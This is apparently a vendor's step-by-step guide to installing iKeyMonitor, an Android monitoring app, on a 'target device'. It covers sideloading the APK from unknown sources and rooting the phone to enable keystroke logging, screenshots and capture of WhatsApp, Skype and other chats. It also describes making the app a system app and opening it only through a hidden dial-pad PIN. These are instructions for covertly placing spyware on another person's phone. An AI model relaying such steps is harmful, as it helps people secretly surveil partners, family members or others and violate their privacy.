Step 1: Check your target device Android OS version to ensure compatibility
Compatibility: Devices running Android OS 2.3.x – 6.x. Non-Rooted Android devices do not support the following features:
- Capturing screenshots
- WhatsApp/Skype/Viber/Kik/Hangouts/Facebook Logging
- Keystroke logging with any keyboard (without changing keyboard)
- Converting iKeyMonitor to System App for better security
If you want to enable above features, please root the Android device first. How to tell if your target Android device has been rooted? Just install iKeyMonitor and see if these features work.
Please go to go to Settings - About Device or About Phone, scroll down the menu screen to locate Android Version. Or visit this page directly on the Android device.
Step 2: Download iKeyMonitor APK file and complete installation
What's an APK file?
APK (application package files) are a compressed single-file package of an Android app. The APK must be executed once (by tapping on the file) for the application to be installed and able to run on the Android device.
Download iKeyMonitor APK: Open a web browser on the target device and download .apk installer from online Cloud panel Download - iKeyMonitor-Android (full version) or go to free download page to get 24-hour free trial first.
Method 1: Download iKeyMonitor APK installer directly on target Android device
Allow application installs from "unknown sources"
- You need to let your phone install APK files from all sources instead of only from Google Play.
- Android 2.x: Go to Settings > Applications > tick "Unknown sources"
- Android 4.x: Go to Settings > Security > tick "Unknown sources"
- Tap on the "Download" icon in your application list to access the latest downloads, then tap on the downloaded iKeyMonitor APK file and choose "Install" to finish the installation.
Notice: You can also use a File Manager to find the downloaded APK and open it to install. Eg: ES File Manager
Method 2: Download iKeyMonitor APK installer on a Computer then Copy to Android device
- Download iKeyMonitor installer onto your computer
- Copy iKeyMonitor.apk installer from Computer to target Android.
- Launch file manager on target device, eg: ES File Manager, locate your Download folder (or wherever you saved your APK) and tap on it to install it.
Notice: On Android 2.x you might have to select "Turn On USB Storage" to be able to copy the APK from your PC to your Android device. You can access it in the notification area in the top of your home screen when your phone is connected to your PC.
Step 3: Access iKeyMonitor
After installation, dial the PIN (default #8888*) in the dial-pad to open iKeyMonitor and configure it. (Other methods to access iKeyMonitor, please learn more in online cloud panel)Tags: install ikeymonitor android , install ikeymonitor apk